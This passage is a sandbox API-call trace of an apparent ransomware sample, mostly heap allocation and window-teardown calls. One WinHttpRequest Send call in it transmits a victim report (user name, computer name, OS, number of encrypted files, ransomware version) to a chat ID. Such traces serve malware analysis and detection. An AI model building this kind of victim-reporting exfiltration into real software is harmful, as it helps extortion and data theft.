[0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0149.970] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4181178 | out: hHeap=0x1780000) returned 1 [0149.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0149.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0149.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x499e648 [0149.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa) returned 0x43cb348 [0149.970] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x18523c0, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x144f2f0*="Send", cNames=0x1, lcid=0x800, rgDispId=0x144f3f4 | out: rgDispId=0x144f3f4*=5) returned 0x0 [0149.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0149.971] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0x18523c0, iTInfo=0x0, lcid=0x800, ppTInfo=0x144f2e8 | out: ppTInfo=0x144f2e8*=0x43fc994) returned 0x0 [0149.971] ITypeInfo:GetTypeAttr (in: This=0x43fc994, ppTypeAttr=0x144f2e0 | out: ppTypeAttr=0x144f2e0) returned 0x0 [0149.971] ITypeInfo:GetNames (in: This=0x43fc994, memid=21295860, rgBstrNames=0x1, cMaxNames=0x144f2d8, pcNames=0x356310 | out: rgBstrNames=0x1, pcNames=0x356310*=0x3225e4) returned 0x0 [0149.971] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x0 | out: ppTComp=0x0) returned 0x0 [0149.971] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70339860, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cb348 | out: pBstrDllName=0x144f4d0*="Send", pbstrName=0x0, pwOrdinal=0x43cb348*=0x53) returned 0x0 [0149.971] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x1 | out: ppTComp=0x1) returned 0x0 [0149.971] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70918628, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cb348 | out: pBstrDllName=0x144f4d0*="Send", pbstrName=0x0, pwOrdinal=0x43cb348*=0x53) returned 0x0 [0149.971] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x2 | out: ppTComp=0x2) returned 0x0 [0149.971] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70918628, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cb348 | out: pBstrDllName=0x144f4d0*="Send", pbstrName=0x0, pwOrdinal=0x43cb348*=0x53) returned 0x0 [0149.971] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x3 | out: ppTComp=0x3) returned 0x0 [0149.971] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70339860, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cb348 | out: pBstrDllName=0x144f4d0*="Send", pbstrName=0x0, pwOrdinal=0x43cb348*=0x53) returned 0x0 [0149.971] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x4 | out: ppTComp=0x4) returned 0x0 [0149.971] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70339860, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cb348 | out: pBstrDllName=0x144f4d0*="Send", pbstrName=0x0, pwOrdinal=0x43cb348*=0x53) returned 0x0 [0149.971] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x5 | out: ppTComp=0x5) returned 0x0 [0149.971] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70339860, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cb348 | out: pBstrDllName=0x144f4d0*="Send", pbstrName=0x0, pwOrdinal=0x43cb348*=0x53) returned 0x0 [0149.971] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x6 | out: ppTComp=0x6) returned 0x0 [0149.971] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70339860, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cb348 | out: pBstrDllName=0x144f4d0*="Send", pbstrName=0x0, pwOrdinal=0x43cb348*=0x53) returned 0x0 [0149.971] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x7 | out: ppTComp=0x7) returned 0x0 [0149.971] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70339860, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cb348 | out: pBstrDllName=0x144f4d0*="Send", pbstrName=0x0, pwOrdinal=0x43cb348*=0x53) returned 0x0 [0149.971] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x8 | out: ppTComp=0x8) returned 0x0 [0149.971] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70339860, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cb348 | out: pBstrDllName=0x144f4d0*="Send", pbstrName=0x0, pwOrdinal=0x43cb348*=0x53) returned 0x0 [0149.971] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x9 | out: ppTComp=0x9) returned 0x0 [0149.971] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70339860, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cb348 | out: pBstrDllName=0x144f4d0*="Send", pbstrName=0x0, pwOrdinal=0x43cb348*=0x53) returned 0x0 [0149.971] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0xa | out: ppTComp=0xa) returned 0x0 [0149.971] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70339860, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cb348 | out: pBstrDllName=0x144f4d0*="Send", pbstrName=0x0, pwOrdinal=0x43cb348*=0x53) returned 0x0 [0149.971] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0xb | out: ppTComp=0xb) returned 0x0 [0149.971] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70339860, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cb348 | out: pBstrDllName=0x144f4d0*="Send", pbstrName=0x0, pwOrdinal=0x43cb348*=0x53) returned 0x0 [0149.972] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0xc | out: ppTComp=0xc) returned 0x0 [0149.972] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70339860, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cb348 | out: pBstrDllName=0x144f4d0*="Send", pbstrName=0x0, pwOrdinal=0x43cb348*=0x53) returned 0x0 [0149.972] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0xd | out: ppTComp=0xd) returned 0x0 [0149.972] ITypeInfo:RemoteGetDocumentation (in: This=0x43fc994, memid=70621180, refPtrFlags=0x356310, pbstrName=0x144f4d0, pBstrDocString=0x0, pdwHelpContext=0x43cb348, pBstrHelpFile=0x5 | out: pbstrName=0x144f4d0*="Send", pBstrDocString=0x0, pdwHelpContext=0x43cb348*=0x650053, pBstrHelpFile=0x5) returned 0x0 [0149.972] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70339860, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cb348 | out: pBstrDllName=0x144f4d0*="Send", pbstrName=0x0, pwOrdinal=0x43cb348*=0x53) returned 0x0 [0149.972] WinHttpRequest:IUnknown:Release (This=0x43fc994) returned 0x1 [0149.972] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17dfde8 [0149.972] WinHttpRequest:IDispatch:Invoke (in: This=0x18523c0, dispIdMember=5, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x144f3d8*(rgvarg=([0]=0x17dfdec*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="chat_id=774541978&text=UserName : FD1HVy\r\nComputerName : NQDPDE\r\nOS : WIN_10\r\nOS Arch : X64\r\nCount of encrypted files : 213\r\nRansomWare version : 1.0", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x144f3a0, puArgErr=0x144f3e8 | out: pDispParams=0x144f3d8*(rgvarg=([0]=0x17dfdec*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="chat_id=774541978&text=UserName : FD1HVy\r\nComputerName : NQDPDE\r\nOS : WIN_10\r\nOS Arch : X64\r\nCount of encrypted files : 213\r\nRansomWare version : 1.0", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x144f3a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x144f3e8*=0x144f408) returned 0x0 [0157.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499e648 | out: hHeap=0x1780000) returned 1 [0157.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0157.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0157.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0157.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17dfde8 | out: hHeap=0x1780000) returned 1 [0157.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0157.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0157.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0157.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0157.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0157.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0157.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43f3c90 | out: hHeap=0x1780000) returned 1 [0157.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0157.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0157.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0157.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0157.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0157.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0157.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0157.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0157.238] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 1 [0157.238] TranslateMessage (lpMsg=0x144f9e4) returned 0 [0157.238] DispatchMessageW (lpMsg=0x144f9e4) returned 0x0 [0157.238] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0157.238] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0157.238] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0157.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0157.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0157.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d13e0 [0157.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0157.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0157.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0157.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d1520 [0157.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0157.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0157.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0157.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0157.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0157.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d1548 [0157.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0157.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0157.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0157.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d1778 [0157.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0157.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0157.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0157.239] LockWindowUpdate (hWndLock=0x0) returned 0 [0157.239] DestroyWindow (hWnd=0x502d2) returned 1 [0157.240] NtdllDefWindowProc_W (hWnd=0x502d2, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0157.241] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0157.247] PostQuitMessage (nExitCode=0) [0157.249] GetMessageW (in: lpMsg=0x144fa9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x144fa9c) returned 0 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360238 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360298 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x430a018 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fe78 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360040 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4309f78 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360088 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ff68 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x430a180 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ff20 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ff50 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x430a040 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fde8 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fed8 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ff38 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43359e0 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fe90 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fe30 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fef0 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ff08 | out: hHeap=0x1780000) returned 1 [0157.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x430a3b0 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fd10 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ffb0 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x430a248 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335770 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43600a0 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fe60 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fe48 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f518 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43357e0 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ffe0 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43600b8 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360028 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f6c8 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335830 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ff80 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fe00 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43600d0 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f5d8 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43357c0 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fe18 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360070 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fff8 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fc20 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335670 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360010 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fec0 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4360058 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fea8 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac380 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f740 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f5f0 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f668 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x430a388 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f4e8 | out: hHeap=0x1780000) returned 1 [0157.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f530 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4309dc0 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f7b8 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f500 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4309d70 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435edc8 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43356e0 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f728 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f6f8 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435eea0 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335820 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f578 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f560 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f818 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4309c58 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43356a0 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fa10 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f950 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f878 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f0b0 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43357f0 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f968 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fa40 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f908 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4266308 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335800 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f980 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435faa0 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fa70 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4309d48 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335700 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f920 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f8f0 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f860 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f398 | out: hHeap=0x1780000) returned 1 [0157.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4335720 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f9b0 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435fa58 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435f938 | out: hHeap=0x1780000) returned 1 [0157.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 